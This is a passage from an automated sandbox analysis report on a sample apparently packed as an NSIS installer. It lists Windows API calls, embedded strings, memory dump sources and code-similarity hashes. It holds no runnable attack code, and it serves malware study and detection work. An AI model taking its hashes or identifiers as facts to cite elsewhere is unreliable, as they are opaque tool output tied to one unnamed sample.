                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                                                                                                                    • Opcode ID: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                    • Instruction ID: a171dc49094d5971c6211130fd655c06747b54d01a1b52cbafa865c71f5bacad
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: afebc9adcdbb38a0c5e5e33596f84c2f2140198a38245a29fea50a5d9e588109
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2CA001BA845500ABCA439B60EF0988ABA62BBA5701B11897AE6565103587325864EB19
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 004049BF
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 004049CC
                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404A1B
                                                                                                                                                                                                                                                                                    • LoadBitmapW.USER32(0000006E), ref: 00404A2E
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,Function_000048F8), ref: 00404A48
                                                                                                                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A5A
                                                                                                                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404A6E
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404A84
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A90
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404AA0
                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(?), ref: 00404AA5
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404AD0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00404ADC
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404B7D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00404BA0
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 00404BB1
                                                                                                                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00404BDB
                                                                                                                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00404BEA
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 00404BFB
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00404CF9
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 00404D54
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00404D69
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00404D8D
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00404DB3
                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 00404DC8
                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 00404DD8
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00404E48
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 00404EF6
                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00404F05
                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00404F25
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00404F75
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 00404F80
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 00404F87
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                                                                                                                    • String ID: $ @$M$N
                                                                                                                                                                                                                                                                                    • API String ID: 1638840714-3479655940
                                                                                                                                                                                                                                                                                    • Opcode ID: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                    • Instruction ID: ef4bce446953bc7ec7e60756d12a1063aab4f745b4df8f164389f1335a379dc2
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 232f7ad113cb9ac5efd1b23bb694dfa7ac126bc5f1dc1702430156d0733604ca
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7B028DB090020AAFEF109F95CD45AAE7BB5FB84314F10417AF611BA2E1C7B89D91CF58
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • DeleteFileW.KERNEL32(?,?,004CF0A0), ref: 00406CE4
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(00467470,\*.*,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D35
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,00409838,?,00467470,?,-00000002,004E30C8,?,004CF0A0), ref: 00406D55
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00406D58
                                                                                                                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00467470,?), ref: 00406D6C
                                                                                                                                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010,000000F2,?), ref: 00406E4E
                                                                                                                                                                                                                                                                                    • FindClose.KERNEL32(?), ref: 00406E5F
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • ptF, xrefs: 00406D1A
                                                                                                                                                                                                                                                                                    • \*.*, xrefs: 00406D2F
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory failed("%s"), xrefs: 00406EDC
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory("%s"), xrefs: 00406E9B
                                                                                                                                                                                                                                                                                    • Delete: DeleteFile("%s"), xrefs: 00406DE8
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory invalid input("%s"), xrefs: 00406E84
                                                                                                                                                                                                                                                                                    • Delete: DeleteFile failed("%s"), xrefs: 00406E29
                                                                                                                                                                                                                                                                                    • Delete: DeleteFile on Reboot("%s"), xrefs: 00406E0C
                                                                                                                                                                                                                                                                                    • RMDir: RemoveDirectory on Reboot("%s"), xrefs: 00406EBF
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                                                                                                                    • String ID: Delete: DeleteFile failed("%s")$Delete: DeleteFile on Reboot("%s")$Delete: DeleteFile("%s")$RMDir: RemoveDirectory failed("%s")$RMDir: RemoveDirectory invalid input("%s")$RMDir: RemoveDirectory on Reboot("%s")$RMDir: RemoveDirectory("%s")$\*.*$ptF
                                                                                                                                                                                                                                                                                    • API String ID: 2035342205-1650287579
                                                                                                                                                                                                                                                                                    • Opcode ID: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                    • Instruction ID: e61cf0fe73e9c947a39cb72df690d6d83a08ee9d5dae9ef8ba60e8d8024aa79e
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a107dcf2f5cda8a7bb449344070620469a6265ca89df76249a653839e461c381
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                                                                                                                                    • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                                                                                                                                    • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                                                                                                                                    • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                                                                                                                                    • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                                                                                                                                      • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                                                                                                                                      • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                    • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                                                                                                                                    • String ID: F$A
                                                                                                                                                                                                                                                                                    • API String ID: 3347642858-1281894373
                                                                                                                                                                                                                                                                                    • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                    • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                                                                                                                                    • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                      • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                                                                                                                                    • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                                                                                                                                    • API String ID: 1916479912-1189179171
                                                                                                                                                                                                                                                                                    • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                    • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                                                                                                                                      • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                    • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                                                                                                                                    • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                                                                                                                                    • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,00424179,74DF23A0,00000000), ref: 00406A73
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                                                                                                                                    • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                                                                                                                    • API String ID: 3581403547-1792361021
                                                                                                                                                                                                                                                                                    • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                    • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                    • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                                                                                                                    • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                                                                                                                                    • API String ID: 542301482-1377821865
                                                                                                                                                                                                                                                                                    • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                    • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                                    • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                    • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1661876602.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661822386.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661894160.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1661909547.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1662030732.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_9EI7wrGs4K.jbxd
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID:
